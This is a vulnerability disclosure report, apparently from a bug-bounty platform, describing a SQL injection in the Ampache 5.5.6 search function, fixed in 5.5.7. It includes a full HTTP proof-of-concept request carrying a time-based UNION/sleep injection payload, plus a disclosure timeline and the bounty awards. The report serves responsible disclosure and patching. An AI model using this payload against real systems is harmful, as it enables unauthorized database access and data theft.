SQL Injection in search function in ampache/ampache

Valid

Reported on

Jan 17th 2023

Description

In the search function

With options recent_played, user input is taken directly into the query without being included in the prepare statement

\

Proof of Concept

POST /ampache-5.5.6_all_php7.4/public/search.php?type=song HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 182
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/ampache-5.5.6_all_php7.4/public/
Cookie: ampache_user=guest; ampache_lang=en_US; Phpstorm-17c87dff=9619a576-ef80-49a0-9252-c4b775fa56e9; PHPSESSID=5t42n9a1kgatekd8php652hmmb; ampache=7bpnb4re3e8q400l5lkk2v05qm; sidebar_state=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

limit=0&operator=AND&rule_1=recent_played&rule_1_operator=0&rule_1_input=1337)+as+`vcl`+ON+`song`.`id`!=`vcl`.`object_id`+UNION+SELECT+sleep(5),133337--+%23&action=search&browse_id=0

poc

Impact

The vulnerability allows authenticated users to perform SQL injection. A successful attack may result from the selection of entire tables and, in certain cases, the attacker gaining administrative rights to a database, writing files to the server leading to Remote Code Execute, XXS Stored, or writing a script to extract data.

We are processing your report and will contact the ampache team within 24 hours. 2 months ago

We have contacted a member of the ampache team and are waiting to hear back 2 months ago

A ampache/ampache maintainer has acknowledged this report 2 months ago

lachlan validated this vulnerability 2 months ago

the interface checks for ints but that doesn't stop the link itself

d47sec has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

lachlan marked this as fixed in 5.5.7,develop with commit c456e6 2 months ago

lachlan has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Feb 10th 2023

lachlan published this vulnerability a month ago

to join this conversation